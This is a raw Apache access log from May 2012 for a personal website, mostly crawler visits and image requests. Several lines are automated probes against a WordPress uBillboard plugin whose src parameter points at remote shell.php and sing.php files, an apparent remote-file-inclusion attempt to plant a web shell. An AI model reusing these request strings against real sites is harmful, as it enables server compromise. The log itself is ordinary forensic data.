24.154.99.103 - - [18/May/2012:12:58:54 -0700] "GET /new/_images/twitter.png HTTP/1.1" 200 934 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:54 -0700] "GET /new/_images/anglimergent.png HTTP/1.1" 200 1081 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:54 -0700] "GET /new/_images/email.png HTTP/1.1" 200 780 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:54 -0700] "GET /new/_images/facebook.png HTTP/1.1" 200 761 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:54 -0700] "GET /new/_images/transform.png HTTP/1.1" 200 947 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:54 -0700] "GET /new/_images/gplus.png HTTP/1.1" 200 1365 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:54 -0700] "GET /new/_images/flickr.png HTTP/1.1" 200 742 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:55 -0700] "GET /new/_images/mh.jpg HTTP/1.1" 200 6166 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:55 -0700] "GET /new/_images/ami.gif HTTP/1.1" 200 8520 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:55 -0700] "GET /new/_images/manga.jpg HTTP/1.1" 200 33115 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:55 -0700] "GET /new/_images/stgeorges.jpg HTTP/1.1" 200 15756 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:55 -0700] "GET /new/_images/MikeC.jpg HTTP/1.1" 200 7085 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
24.154.99.103 - - [18/May/2012:12:58:56 -0700] "GET /new/_images/chcnew.jpg HTTP/1.1" 200 4093 "http://mcroghan.blogspot.com/2011/05/why-i-dont-need-tablet.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.12.2.16749)"
199.21.99.68 - - [18/May/2012:13:08:11 -0700] "GET /photos/CleanSweepPhotos/ HTTP/1.1" 200 1011 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
208.115.111.72 - - [18/May/2012:13:08:55 -0700] "GET /robots.txt HTTP/1.1" 404 495 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
199.21.99.68 - - [18/May/2012:13:11:24 -0700] "GET /photos/IonaAbbeySundayCommunion/ HTTP/1.1" 200 828 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:13:39:56 -0700] "GET /photos/?C=N;O=D HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
1.202.218.8 - - [18/May/2012:13:58:32 -0700] "GET /robots.txt HTTP/1.0" 404 514 "-" "\"Mozilla/5.0"
218.38.16.103 - - [18/May/2012:14:00:51 -0700] "GET /logs/error.log/wp-content/plugins/uBillboard/?src=http://picasa.com.tomi.com.au/logs/shell.php HTTP/1.1" 503 532 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
218.38.16.103 - - [18/May/2012:14:00:53 -0700] "GET /wp-content/plugins/uBillboard/?src=http://picasa.com.tomi.com.au/logs/shell.php HTTP/1.1" 503 532 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
218.38.16.103 - - [18/May/2012:14:00:54 -0700] "GET /logs/wp-content/plugins/uBillboard/?src=http://picasa.com.tomi.com.au/logs/shell.php HTTP/1.1" 503 532 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
218.38.16.103 - - [18/May/2012:14:00:55 -0700] "GET /logs/error.log%22%20class=%22resultLink/wp-content/plugins/uBillboard/?src=http://picasa.com.tomi.com.au/logs/shell.php HTTP/1.1" 503 532 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
199.21.99.68 - - [18/May/2012:14:03:18 -0700] "GET /photos/FDB.php HTTP/1.1" 200 239 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
208.115.111.72 - - [18/May/2012:14:03:37 -0700] "GET /logs/hits/bandwidth.20030627 HTTP/1.1" 200 256 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
208.115.111.72 - - [18/May/2012:14:03:40 -0700] "GET /photos/HikingtheAppalachianTrailJuly2005/photos/photo4.html HTTP/1.1" 200 2050 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
199.21.99.68 - - [18/May/2012:14:04:07 -0700] "GET /photos/NeilandHeathersWedding/ HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:14:07:27 -0700] "GET /photos/PhiladelphiaOctober2004/ HTTP/1.1" 200 1145 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:14:20:18 -0700] "GET /photos/TheHolidays2004/ HTTP/1.1" 200 1315 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:14:28:00 -0700] "GET /photos/ExtendedFamilyPhotos/ HTTP/1.1" 200 1307 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:14:31:37 -0700] "GET /d/?C=M;O=A HTTP/1.1" 200 594 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
180.76.5.107 - - [18/May/2012:14:38:14 -0700] "GET /logs/analog/ HTTP/1.1" 200 658 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
199.21.99.68 - - [18/May/2012:14:38:23 -0700] "GET /photos/NewYearsEve2005/ HTTP/1.1" 200 963 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:14:42:41 -0700] "GET /photos/2007fw4.pdf HTTP/1.1" 200 230382 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:14:44:17 -0700] "GET /photos/Halloween2004/ HTTP/1.1" 200 1286 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.73.154 - - [18/May/2012:15:14:40 -0700] "GET /logs/hits/bandwidth.20041109 HTTP/1.1" 200 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.154 - - [18/May/2012:15:28:23 -0700] "GET /logs/hits/bandwidth.20041113 HTTP/1.1" 200 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.21.99.68 - - [18/May/2012:15:28:47 -0700] "GET /tableoffaiths/ HTTP/1.1" 304 193 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.73.154 - - [18/May/2012:15:31:49 -0700] "GET /logs/hits/bandwidth.20041114 HTTP/1.1" 200 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/stgeorges.jpg HTTP/1.1" 200 15756 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/mh.jpg HTTP/1.1" 200 6167 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/chcnew.jpg HTTP/1.1" 200 4093 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/facebook.png HTTP/1.1" 200 761 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/flickr.png HTTP/1.1" 200 743 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/tat_small.png HTTP/1.1" 200 29474 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/MikeC.jpg HTTP/1.1" 200 7086 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/manga.jpg HTTP/1.1" 200 33115 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/email.png HTTP/1.1" 200 780 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/anglimergent.png HTTP/1.1" 200 1081 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/ami.gif HTTP/1.1" 200 8519 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/twitter.png HTTP/1.1" 200 933 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/linkedin.png HTTP/1.1" 200 911 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:49 -0700] "GET /new/_images/transform.png HTTP/1.1" 200 947 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:50 -0700] "GET /new/_images/gplus.png HTTP/1.1" 200 1366 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
31.52.249.110 - - [18/May/2012:15:40:51 -0700] "GET /new/_images/cticon.png HTTP/1.1" 200 509 "http://mcroghan.blogspot.co.uk/2006/05/confession-and-absolution.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
199.21.99.68 - - [18/May/2012:15:42:42 -0700] "GET /logs/ HTTP/1.1" 200 791 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:15:42:44 -0700] "GET /new/ HTTP/1.1" 200 562 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
199.21.99.68 - - [18/May/2012:15:42:47 -0700] "GET /d/?C=S;O=D HTTP/1.1" 200 591 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.73.154 - - [18/May/2012:15:45:32 -0700] "GET /robots.txt HTTP/1.1" 404 494 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.154 - - [18/May/2012:15:45:32 -0700] "GET /logs/hits/bandwidth.20041111 HTTP/1.1" 200 311 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.154 - - [18/May/2012:15:51:41 -0700] "GET /logs/hits/bandwidth.20041110 HTTP/1.1" 200 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.115.111.72 - - [18/May/2012:16:03:16 -0700] "GET /robots.txt HTTP/1.1" 404 495 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
202.47.77.130 - - [18/May/2012:16:06:04 -0700] "GET /logs/error.log/wp-content/plugins/uBillboard/?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 549 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
202.47.77.130 - - [18/May/2012:16:06:06 -0700] "GET /wp-content/plugins/uBillboard/?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 534 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
202.47.77.130 - - [18/May/2012:16:06:07 -0700] "GET /logs/wp-content/plugins/uBillboard/?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 539 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
202.47.77.130 - - [18/May/2012:16:06:08 -0700] "GET /logs/error.log%22%20class=%22resultLink/wp-content/plugins/uBillboard/?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 578 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
199.21.99.68 - - [18/May/2012:16:06:59 -0700] "GET /?C=M;O=A HTTP/1.1" 200 632 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.73.154 - - [18/May/2012:16:11:38 -0700] "GET /logs/hits/bandwidth.20041116 HTTP/1.1" 200 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.154 - - [18/May/2012:16:14:08 -0700] "GET /logs/hits/bandwidth.20041117 HTTP/1.1" 200 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/twitter.png HTTP/1.1" 200 878 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/email.png HTTP/1.1" 200 724 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/linkedin.png HTTP/1.1" 200 856 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/anglimergent.png HTTP/1.1" 200 1025 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/gplus.png HTTP/1.1" 200 1310 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/flickr.png HTTP/1.1" 200 687 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/facebook.png HTTP/1.1" 200 705 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
108.171.190.102 - - [18/May/2012:16:20:57 -0700] "GET /new/_images/tat_small.png HTTP/1.1" 200 29418 "-" "Mozilla/5.0 (compatible; Embedly/0.2; snap; +http://support.embed.ly/)"
178.73.212.244 - - [18/May/2012:16:33:51 -0700] "GET /logs/access.log.2012-01-02 HTTP/1.0" 404 530 "http://shunyata.net/logs/access.log.2012-01-02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
178.73.212.244 - - [18/May/2012:16:33:51 -0700] "GET / HTTP/1.0" 200 1138 "http://shunyata.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
208.115.111.72 - - [18/May/2012:16:59:19 -0700] "GET /logs/hits/bandwidth.20030625 HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
208.115.111.72 - - [18/May/2012:16:59:22 -0700] "GET /new/dailyoffice/?C=N;O=A HTTP/1.1" 200 833 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
180.76.5.107 - - [18/May/2012:17:01:32 -0700] "GET /photos/BackpackingApril2005/index.html HTTP/1.1" 200 1069 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.5.89 - - [18/May/2012:17:01:32 -0700] "GET /photos/BackpackingApril2005/ HTTP/1.1" 200 1069 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.73.154 - - [18/May/2012:17:01:58 -0700] "GET /logs/hits/bandwidth.20041118 HTTP/1.1" 200 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
1.202.218.8 - - [18/May/2012:17:03:02 -0700] "GET /robots.txt HTTP/1.0" 404 514 "-" "\"Mozilla/5.0"
66.249.73.150 - - [18/May/2012:17:26:46 -0700] "GET /robots.txt HTTP/1.1" 404 494 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.150 - - [18/May/2012:17:26:46 -0700] "GET /favicon.ico HTTP/1.1" 200 275 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.73.154 - - [18/May/2012:18:09:56 -0700] "GET /logs/hits/bandwidth.20041115 HTTP/1.1" 200 312 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.154 - - [18/May/2012:18:12:27 -0700] "GET /logs/hits/ref.20031019 HTTP/1.1" 200 9198 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.150 - - [18/May/2012:19:13:30 -0700] "GET /mara2.htm HTTP/1.1" 404 494 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
180.76.5.195 - - [18/May/2012:19:25:32 -0700] "GET /logs/hits/hits.20041002 HTTP/1.1" 304 136 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
208.115.113.88 - - [18/May/2012:19:30:14 -0700] "GET /robots.txt HTTP/1.1" 404 495 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
38.107.179.220 - - [18/May/2012:19:40:59 -0700] "GET /robots.txt HTTP/1.1" 404 457 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.179.221 - - [18/May/2012:19:41:29 -0700] "GET / HTTP/1.1" 200 597 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
199.21.99.68 - - [18/May/2012:19:41:38 -0700] "GET /?C=M;O=D HTTP/1.1" 200 630 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
38.107.179.222 - - [18/May/2012:19:41:56 -0700] "GET /_images/SpaceHo.JPG HTTP/1.1" 200 1522 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.179.223 - - [18/May/2012:19:42:22 -0700] "GET /_images/ZbThumbnail.info HTTP/1.1" 200 4697 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.179.224 - - [18/May/2012:19:42:47 -0700] "GET /confucia.htm HTTP/1.1" 404 459 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"